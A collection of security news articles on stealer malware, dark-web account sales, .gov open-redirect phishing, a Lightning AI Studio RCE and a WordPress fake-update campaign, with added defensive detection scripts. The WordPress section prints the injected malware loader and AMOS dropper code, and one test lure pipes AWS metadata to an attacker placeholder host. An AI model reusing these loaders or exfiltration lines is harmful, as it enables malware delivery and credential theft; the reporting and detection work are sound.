  • Use Reliable Security Solutions: Install mobile antivirus tools to detect and block malware.

The Tria Stealer malware campaign highlights the evolving tactics of cybercriminals targeting Android users.

By leveraging social engineering techniques and advanced data exfiltration methods, this malware poses a serious threat to personal and financial security. Users are urged to remain vigilant and adopt best practices to safeguard against such attacks.


Hackers Sell Compromised Emails and Google Ads Accounts on Dark Web


A new wave of cybercrime is surfacing as hackers exploit compromised emails and digital advertising platforms to create a thriving underground economy.

This illegal marketplace, primarily hosted on the dark web, trades in aged and pre-verified accounts, offering tech-savvy criminals tools to bypass security mechanisms and perpetrate malicious activity.

The Illicit Trade of Verified Accounts

Following a detailed investigation, researchers uncovered over 100 newly registered domains in December 2024, predominantly marketing pre-verified and aged accounts for platforms such as Google Ads, email providers, and social media networks.

These accounts, often obtained via phishing scams, hacking, or other nefarious means, are highly sought after for their ability to evade account verification processes and utilize the inherent trust associated with aged profiles.

While some purchasers seek these accounts for benign uses, such as targeting specific regions or enhancing social media marketing, many turn them into tools of fraud, spam, and disinformation dissemination.

These activities underline the new challenges posed by these underground marketplaces in an increasingly interconnected digital world.

Notable Domains in the Illicit Ecosystem

Several domains have been identified as key players in this ecosystem, offering everything from cloud service accounts to social media pages.

These websites claim to provide “pre-verified” and “aged” accounts to buyers, with promises of complete control over the purchased accounts.

Figure: Premium and aged social media acc

Cloud and Advertising Accounts for Sale

  1. Topcloudacc[.]com
    • Offers accounts for platforms like AWS, Google Ads, and Oracle Cloud.
    • Website Title: “Buy AWS Account | Best 32-vCPU & Credit Account – 2025″
  2. Acctrusted[.]com
    • Claims to specialize in cloud services, including AWS, Azure, and DigitalOcean accounts.
    • Website Title: “Buy AWS Accounts | Best Vcpu & Credit Account For Sale 2024″
  3. Buybhwaccounts[.]xyz
    • Markets ads accounts and cloud accounts alongside BHW profiles.
    • Website Title: “Buy BHW Accounts – BHW Accounts For Sale – buybhwaccounts[.]xyz”

Social Media and Email Accounts

  1. Regularpva[.]com
    • Sells social media and dating accounts, including Facebook, Instagram, Gmail, and Yahoo.
    • Website Title: “Buy Social Media Accounts – Social Media Pages for Sale – SecurePVA”
  2. Discordarena[.]com
    • Redirects from other domains and sells “premium aged Discord accounts.”
  3. Redditaccsbuy[.]com
    • Specializes in aged and verified Reddit accounts with built-up karma.
    • Website Title: “Reddit Accounts with Karma for Sale”

The investigation reveals a troubling development in the sale of aged Google Ads accounts. Research shows that 128 nearly identical websites, created in December 2024, operate as interconnected networks to sell these accounts.

Figure: Google Ads

Using private blog networks (PBNs) to manipulate search engine rankings, these sites aim to direct maximum traffic to their illicit marketplaces.

Aged Google Ads accounts are particularly valuable to buyers trying to bypass Google’s robust review mechanisms.

Figure: Aged Google Ads accounts

These accounts, perceived as less likely to be flagged for suspicious activity, are often used for unauthorized advertising campaigns or black-hat marketing tactics.

The sale of pre-verified and aged accounts poses a significant cybersecurity threat. These accounts fuel criminal enterprises, from financial fraud to the spread of disinformation, and create complexities for digital platforms striving to ensure user security.

As the underground market for these accounts grows, cybersecurity experts and tech companies face mounting pressure to address this evolving threat.

Enhanced security protocols, detection of account irregularities, and proactive measures against phishing scams may hold the key to combating this alarming trend in cybercrime.


Cybercriminals Hijack Government Sites to Launch Phishing Attacks


Cybersecurity researchers have identified a persistent trend in which threat actors exploit vulnerabilities in government websites to further phishing campaigns.

Based on data spanning November 2022 through November 2024, malicious actors have misused numerous government domains (.gov and country-level equivalents such as gov.br) across more than 20 countries.

Exploitation of Legitimate .Gov Domains

While .gov domains are generally trusted by users, this trust is being exploited to host phishing pages, redirect victims to malicious links, or even serve as command and control (C2) servers.

Open redirects, a class of vulnerability in which a web application forwards the browser to an attacker-supplied destination without validating it, play a central role in these campaigns.

Exploited .gov domains are often embedded in phishing emails, allowing attackers to bypass secure email gateways (SEGs) that inherently trust government-linked domains.

Victims, unaware of the redirection, are lured into sharing sensitive credentials on phishing pages.

Role of Liferay Platforms

A significant portion of the abuse stems from open redirects linked to CVE-2024-25608, a vulnerability in the widely used Liferay digital experience platform.

Nearly 60% of observed phishing campaigns involving .gov domains used URLs carrying the “noSuchEntryRedirect” parameter, which is the indicator of this specific exploit.

Liferay’s adoption across multiple governmental organizations may have contributed to this extensive abuse.

The vulnerability allows attackers to redirect users to credential phishing pages or intermediary sites.
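Because the link really does point at a government host, the thing to inspect is the query string rather than the domain. The following is an added example, not Cofense's code: it extracts URLs from a message body (a constructed sample is embedded), and flags any URL whose host is a government domain while a redirect-style parameter, including Liferay's `noSuchEntryRedirect`, resolves to a different host. It decodes the value twice because the destination is often double-encoded, and handles protocol-relative (`//evil`) destinations. The parameter list, the Liferay-style path and the sample URLs are assumptions of this script.

```python
"""Find open-redirect abuse of trusted government hosts in URLs from an email.

Added example, not Cofense's code. The redirect parameter names, the sample
message and the Liferay-style URL path are constructed for the example.
"""
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qsl, unquote

REDIRECT_PARAMS = {"nosuchentryredirect", "redirect", "redirect_uri", "redirecturl",
                   "url", "next", "returnurl", "return_to", "goto", "dest", "target"}
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def is_government_host(host: str) -> bool:
    """True for .gov hosts and country-style gov.xx / gob.xx hosts."""
    labels = host.lower().split(".")
    return "gov" in labels or "gob" in labels


def external_destination(value: str, trusted_host: str) -> Optional[str]:
    """Host that the parameter value redirects to if it leaves trusted_host, else None."""
    for _ in range(2):              # tolerate double URL-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if value.startswith("//"):      # protocol-relative redirect keeps the scheme, changes host
        value = "https:" + value
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None                 # relative path: the user stays on the trusted host
    dest = (parts.hostname or "").lower()
    if dest == trusted_host or dest.endswith("." + trusted_host):
        return None
    return dest


def find_open_redirects(text: str) -> list:
    """One finding per government-hosted URL whose redirect parameter leaves the host."""
    findings = []
    for url in URL_RE.findall(text):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if not is_government_host(host):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key.lower() not in REDIRECT_PARAMS:
                continue
            dest = external_destination(value, host)
            if dest:
                findings.append({"trusted_host": host, "param": key,
                                 "destination": dest, "url": url})
    return findings


# Constructed email body: one Liferay-style abuse, one harmless internal
# redirect on a .gov host, and one ordinary non-government link.
SAMPLE_EMAIL = """Your mailbox is almost full. Review the shared documents here:
https://portal.example.gov.br/c/portal/login?noSuchEntryRedirect=https%3A%2F%2Fphish.example.net%2Fms%2Flogin
Help: https://www.example.gov/login?next=/dashboard
Unsubscribe: https://news.example.com/unsub?id=42
"""

if __name__ == "__main__":
    for f in find_open_redirects(SAMPLE_EMAIL):
        print(f"{f['trusted_host']} ?{f['param']}= -> {f['destination']}")
```

A secure email gateway that scores a link only on its host will pass the first URL; a rule built on the same logic as this script, applied to the query string, is what closes that gap until the portal itself is patched.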

Although such vulnerabilities are not exclusive to government websites, their presence underscores the importance of vigilance among web developers.

According to the Cofense report, governments and organizations must prioritize patch management and security auditing to mitigate risks stemming from outdated or unpatched software.

While .gov domains affiliated with the United States accounted for only 9% of all exploited domains, they remain the third most-targeted globally.

All observed cases of U.S.-specific .gov domain abuse involved open redirects, primarily linked to CVE-2024-25608.

Microsoft-themed phishing campaigns were particularly prominent, often featuring emails impersonating legitimate entities and bypassing widely used SEGs such as Microsoft ATP, Cisco IronPort, and Proofpoint.

Statistical analysis reveals that the majority of abuse originates from a small subset of government domains.

For example, Brazilian .gov domains emerged as the most exploited, but the misuse was concentrated in a limited number of unique domains.

This pattern was consistent across other countries, suggesting targeted exploitation rather than widespread vulnerability.

In addition to redirect-based abuse, some compromised .gov domain email addresses have been repurposed as C2 infrastructure for malware, such as Agent Tesla Keylogger and StormKitty.

Despite these incidents, the frequency remains low, highlighting that governments may be taking steps to safeguard email systems.

The exploitation of .gov domains for phishing underscores the broader challenge of securing trusted digital infrastructure.

With government websites serving as high-value targets, sustained monitoring, timely patching, and security awareness at the organizational level are critical to mitigating risks.

As threat actors continue to innovate, collaborative efforts in cybersecurity will play a pivotal role in defending against evolving threats.


Hackers Can Exploit AI Platform to Achieve Root Access via RCE Vulnerability


In a critical development within the AI industry, researchers at Noma Security have disclosed the discovery of a high-severity Remote Code Execution (RCE) vulnerability in Lightning AI Studio, a widely adopted AI development platform.

The vulnerability, assigned a CVSS score of 9.4, was found to enable attackers to execute arbitrary commands with root privileges, posing significant threats such as data exfiltration and system compromise.

The issue has since been resolved in close collaboration with Lightning AI.

Vulnerability Overview

The RCE vulnerability stemmed from a hidden URL parameter called command, embedded within Lightning AI Studio’s terminal functionality.

This parameter, though concealed from users, could be manipulated to execute malicious commands.

Attackers could Base64-encode a command, append it to a victim-specific URL as the command parameter, and rely on the platform's lack of input sanitization to have it executed.

For instance, an attacker could embed a command to recursively delete all files or retrieve sensitive AWS metadata, including access tokens, and redirect them to a remote server.

The exploit relied on publicly accessible details such as usernames and studio paths, which attackers could glean from Lightning AI’s shared Studio templates.

Victims could be targeted via malicious links, shared through email or public forums, that triggered the exploit upon a single click.

Lightning AI Studio operates as a flexible, cloud-based AI development platform, supporting various AI workflows such as training and deployment.

With features such as a VSCode-like interface and persistent environments, it has gained popularity among enterprises and developers.

However, vulnerabilities in its handling of user-controllable inputs, such as hidden URL parameters, made it susceptible to this critical exploit.

The URL schema for Lightning AI Studio links includes variables like PROFILE_USERNAME and STUDIO_PATH, uniquely identifying user studios.

Attackers leveraged these variables to craft malicious URLs, redirecting authenticated users to terminals embedded with harmful commands.

Impact of the Exploit

The implications of this exploit underscored its criticality.

Attackers could potentially:

  • Execute Arbitrary Commands: Using root privileges via authenticated user sessions to manipulate systems.
  • Exfiltrate Data: Sensitive metadata, such as AWS credentials, could be accessed and transferred to malicious servers.
  • Compromise Filesystems: Attackers could delete or modify crucial system files, disrupting operations.

Given the platform’s integration into enterprise-grade AI workflows, the risk of exploitation extended to sensitive AI models and data pipelines across shared environments.

Following responsible disclosure on October 14, 2024, Noma Security and Lightning AI collaborated to address the vulnerability swiftly. A fix was released by October 25, 2024.

Key takeaways from this incident included the need for robust input validation, adherence to the principle of least privilege, and avoidance of directly executing user-controlled inputs to prevent command injection vulnerabilities.
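To make the mechanics described above and the takeaways concrete, here is an added Python example; it is not Lightning AI's code, and the link layout `https://<host>/<PROFILE_USERNAME>/<STUDIO_PATH>?command=<base64>` is assumed from the article's description rather than taken from the platform's real schema. `decode_command_param` and `classify_link` are a SOC-side check for links shared by email or in forums; `vulnerable_terminal_init` shows the dispatch pattern the article describes (it returns the argv instead of executing it), and `hardened_terminal_init` replaces the free-text command with a hypothetical allowlist of named actions. `studio.example` and `attacker.example` are placeholders.

```python
"""URL triage for a base64-encoded `command` parameter, the dispatch pattern
that makes it dangerous, and a safer alternative.

Added example; not Lightning AI's code. The link layout
  https://<host>/<PROFILE_USERNAME>/<STUDIO_PATH>?command=<base64>
is an assumption drawn from the article, not the platform's real schema, and
studio.example / attacker.example are placeholders.
"""
import base64
from typing import Dict, List, Optional
from urllib.parse import parse_qs, quote, urlparse

# Substrings matching what the article says attackers encoded: recursive
# deletion and pulling AWS instance metadata out to a remote host.
DANGEROUS_TOKENS = ("rm -rf", "169.254.169.254", "curl ", "wget ", "| sh", "| bash")


def decode_command_param(url: str) -> Optional[str]:
    """Decoded `command` query parameter, or None if absent or not valid base64."""
    values = parse_qs(urlparse(url).query).get("command")
    if not values:
        return None
    # parse_qs turns an unencoded '+' into a space; base64 never contains spaces,
    # so put it back. Also accept the URL-safe alphabet and stripped padding.
    token = values[0].replace(" ", "+").replace("-", "+").replace("_", "/")
    token += "=" * (-len(token) % 4)
    try:
        return base64.b64decode(token, validate=True).decode("utf-8") or None
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return None


def classify_link(url: str) -> Dict[str, object]:
    """Triage verdict: any decodable `command` is suspicious; one carrying a
    destructive or exfiltration token is malicious."""
    cmd = decode_command_param(url)
    if cmd is None:
        return {"verdict": "clean", "command": None, "indicators": []}
    hits = [t for t in DANGEROUS_TOKENS if t in cmd]
    return {"verdict": "malicious" if hits else "suspicious", "command": cmd, "indicators": hits}


def vulnerable_terminal_init(url: str) -> Optional[List[str]]:
    """The pattern the article describes: decoded URL text goes straight to a
    shell (as root on the studio). Returns the argv instead of running it."""
    cmd = decode_command_param(url)
    return ["/bin/sh", "-c", cmd] if cmd else None


# Hypothetical allowlist: a link may name an action, never supply a command line.
ALLOWED_ACTIONS = {"open-terminal": ["bash", "-l"], "tail-logs": ["tail", "-n", "50", "studio.log"]}


def hardened_terminal_init(url: str) -> Optional[List[str]]:
    """Map a named `action` parameter to a fixed argv; reject any `command`
    parameter outright (even an empty one) and return None for unknown actions."""
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    if "command" in params:
        return None
    action = params.get("action", [""])[0]
    return list(ALLOWED_ACTIONS[action]) if action in ALLOWED_ACTIONS else None


def make_sample_url(username: str, studio_path: str, command: str) -> str:
    """Constructed lure URL for testing; uses the assumed link layout above."""
    token = base64.b64encode(command.encode()).decode()
    return f"https://studio.example/{username}/{studio_path}?command={quote(token, safe='')}"


if __name__ == "__main__":
    lure = make_sample_url("alice", "studios/demo",
                           "curl -s http://169.254.169.254/latest/meta-data/ | curl -X POST -d @- http://attacker.example/")
    print(classify_link(lure))
    print(vulnerable_terminal_init(lure))
    print(hardened_terminal_init(lure))
```

The hardened variant is the least-privilege point from the takeaways in code: the URL may select among fixed, pre-approved argv lists, but no text from the URL ever reaches a shell.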

This discovery highlights the critical importance of integrating comprehensive security measures into AI development lifecycles.

As the industry continues to innovate rapidly, ensuring the resilience of platforms like Lightning AI remains paramount.

Noma Security’s efforts in uncovering and mitigating such threats underscore their commitment to protecting the AI ecosystem.


10,000 WordPress Websites Hacked to Distributing MacOS and Microsoft Malware


Over 10,000 WordPress websites have been hijacked to deliver malicious software targeting both macOS and Windows users.

Researchers revealed this week how attackers leveraged vulnerabilities in outdated WordPress software and plugins to distribute malware via fake browser update pages presented through an iframe.

The malicious campaign delivers two distinct strains of malware:

  • AMOS (Atomic macOS Stealer): Targeting macOS users, this malware steals sensitive information such as passwords, browser data, and cryptocurrency wallets.
  • SocGholish: A known malware strain targeting Windows users, often disguised as fake browser updates to trick victims into installing it.

What makes this campaign particularly significant is that it represents the first known instance of these two malware families being delivered together through a single client-side attack.

Here are two of the largest domains identified across thousands of websites - blackshelter[.]org blacksaltys[.]com

Typically distributed by different groups, their presence together on compromised websites raises questions about collaboration or a single sophisticated threat actor.

How the Attack Works

The attackers embedded malicious JavaScript into compromised WordPress websites. The highly obfuscated script generates a fake Google Chrome update page within an iframe, tricking victims into downloading the malware.

Key Observations

  • Vulnerabilities in outdated WordPress installations and plugins were exploited to inject the malicious code; affected sites included ones running WordPress 6.7.1.
  • The JavaScript used in the attack dynamically loads an external script and defeats caching by appending the current Unix time to the URL:
// Self-invoking loader: creates a <script> element (f = 'script'), points it at
// the attacker's CDN-styled host (e) and inserts it before the first existing script.
(function(o, q, f, e, w, j) {
    w = q.createElement(f);
    j = q.getElementsByTagName(f)[0];
    w.async = 1;
    w.src = e;
    j.parentNode.insertBefore(w, j);
})(window, document, 'script',
   // The Unix-time query string changes every second, so each visit fetches a fresh copy
   `https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js?qbsfsc=${Math.floor(Date.now() / 1000)}`);

The loaded script then stops the page from loading further, strips attributes from key HTML elements, and injects an iframe that displays the fake update page.

Domains and Distribution

Researchers identified several malicious domains linked to the campaign, with blackshelter[.]org and blacksaltys[.]com among the most significant.

Sample Malicious Elements on Compromised Sites:

  • Script tags loading malicious JavaScript from external domains:
<script type="rocketlazyloadscript" src="https://blacksaltys[.]com/..."></script>
  • Prefetch DNS elements to enhance performance for malicious domains:
<link rel='dns-prefetch' href='//blacksaltys[.]com'>

macOS and Windows Malware Analysis

Researchers uncovered a script that, on a signal from the fake-update iframe, triggers the download of the AMOS payload for macOS users:

<script>
(async () => {
    // Hidden anchor pointing at the PHP dropper; the timestamp again defeats caching
    var btn = document.createElement("a");
    btn.href = `hxxps://extendedstaybrunswick[.]com/.../resty.php?eg=${Math.floor(Date.now() / 1000)}`;
    btn.download = "C_6.12.4.dmg";          // saved under a Chrome-style disk image name
    document.body.appendChild(btn);
    // The fake-update iframe posts "download" to the parent page, which then clicks the link
    window.addEventListener("message", function (event) {
        if (event.data == "download") {
            setTimeout(() => btn.click(), 100);
        }
    });
})();
</script>

For Windows users, the SocGholish malware was delivered using similar mechanisms, disguised as a legitimate software update.

Analysis and Impact

The compromised websites were found to load malicious scripts hosted on domains including:

  • blacksaltys[.]com
  • objmapper[.]com
  • rednosehorse[.]com

A script hosted on deski.fastcloudcdn[.]com, flagged by c/side researchers, was detected by only 17 of 96 VirusTotal engines at the time, showing how effectively the obfuscation evades signature-based scanning.

Both AMOS and SocGholish are commercially available malware and are known to be sold on underground platforms like Telegram.

The campaign’s ability to target both macOS and Windows users demonstrates the attackers’ evolving tactics and highlights the risks posed by outdated software.

Website administrators are urged to update WordPress installations and plugins immediately and deploy client-side monitoring tools to identify malicious scripts.
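One form the recommended client-side monitoring can take, as an added Python example rather than c/side's tooling: scan a page's HTML for the injection traits quoted above, namely script and dns-prefetch references to off-site hosts (with the IoC domains from this report recognised by name), the `rocketlazyloadscript` type (a legitimate WP Rocket attribute that the injected tag reuses), and inline scripts carrying the cache-busting timestamp, iframe creation, forced `.dmg` download or `postMessage` trigger seen in the loader and dropper. `SAMPLE_PAGE` is a constructed page and `example-site.test` a placeholder for the site being checked.

```python
"""Scan a WordPress page's HTML for the injection traits in this report.

Added example, not c/side's tooling. SAMPLE_PAGE is a constructed page and
example-site.test a placeholder for the site being checked.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Domains named in the report (defanged there; matched in plain form here).
IOC_DOMAINS = {
    "blackshelter.org", "blacksaltys.com", "objmapper.com", "rednosehorse.com",
    "deski.fastcloudcdn.com", "extendedstaybrunswick.com",
}
# Traits of the quoted loader and AMOS dropper scripts.
INLINE_SIGNATURES = {
    "cache-busting loader": re.compile(r"Date\.now\(\)\s*/\s*1000"),
    "iframe injection": re.compile(r"createElement\(\s*['\"]iframe['\"]"),
    "forced installer download": re.compile(r"\.download\s*=\s*['\"][^'\"]+\.(?:dmg|exe|msi)['\"]", re.I),
    "postMessage-triggered click": re.compile(r"addEventListener\(\s*['\"]message['\"]"),
}
URL_HOST = re.compile(r"h(?:tt|xx)ps?://([A-Za-z0-9.-]+)")


def _host(ref: str) -> str:
    """Hostname of a src/href; '' for same-origin relative references."""
    return (urlparse(ref.replace("[.]", ".").strip()).hostname or "").lower()


class InjectionScanner(HTMLParser):
    def __init__(self, site_host: str, allowed_hosts=()) -> None:
        super().__init__()
        self.allowed = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
        self.findings: List[Dict[str, Optional[str]]] = []
        self._in_script = False
        self._buf: List[str] = []

    def _check_host(self, kind: str, ref: str, note: Optional[str] = None) -> None:
        host = _host(ref)
        if not host or host in self.allowed:
            return
        self.findings.append({"kind": kind, "host": host, "note": note,
                              "severity": "high" if host in IOC_DOMAINS else "medium"})

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script, self._buf = True, []
            if a.get("src"):
                # type="rocketlazyloadscript" is WP Rocket's legitimate delay
                # attribute; the injected tag reuses it to defer the loader.
                note = ("deferred via type=rocketlazyloadscript"
                        if a.get("type") == "rocketlazyloadscript" else None)
                self._check_host("external script", a["src"], note)
        elif tag == "link" and "dns-prefetch" in a.get("rel", "").lower():
            self._check_host("dns-prefetch", a.get("href", ""))
        elif tag == "iframe" and a.get("src"):
            self._check_host("iframe", a["src"])

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag != "script" or not self._in_script:
            return
        self._in_script = False
        body = "".join(self._buf).replace("[.]", ".")
        hits = [name for name, rx in INLINE_SIGNATURES.items() if rx.search(body)]
        hosts = {h.lower() for h in URL_HOST.findall(body)} - self.allowed
        # Off-site hosts alone are not flagged (analytics noise); IoC hosts or signatures are.
        if hits or hosts & IOC_DOMAINS:
            self.findings.append({
                "kind": "inline script", "host": ",".join(sorted(hosts)) or None,
                "note": ", ".join(hits) or None,
                "severity": "high" if hosts & IOC_DOMAINS or len(hits) > 1 else "medium"})


def scan_html(html: str, site_host: str, allowed_hosts=()) -> List[Dict[str, Optional[str]]]:
    scanner = InjectionScanner(site_host, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page carrying the same traits as the quoted snippets.
SAMPLE_PAGE = """<!doctype html><html><head>
<link rel='dns-prefetch' href='//fonts.googleapis.com'>
<link rel='dns-prefetch' href='//blacksaltys.com'>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script type="rocketlazyloadscript" src="https://blacksaltys.com/assets/app.js"></script>
<script>
(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;
j.parentNode.insertBefore(w,j);})(window,document,'script',
`https://deski.fastcloudcdn.com/loader.js?v=${Math.floor(Date.now() / 1000)}`);
</script>
</head><body><p>Welcome.</p>
<script>var f=document.createElement('iframe');f.src='https://example-site.test/update';</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, "example-site.test", allowed_hosts=["fonts.googleapis.com"]):
        print(finding)
```

Run against a live page, the scan should be fed the HTML as a browser receives it (after any server-side caching layer), since the injected tags sit in the delivered markup rather than in the theme files alone.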

Affected users should run comprehensive malware scans and remain cautious of fake browser update prompts.
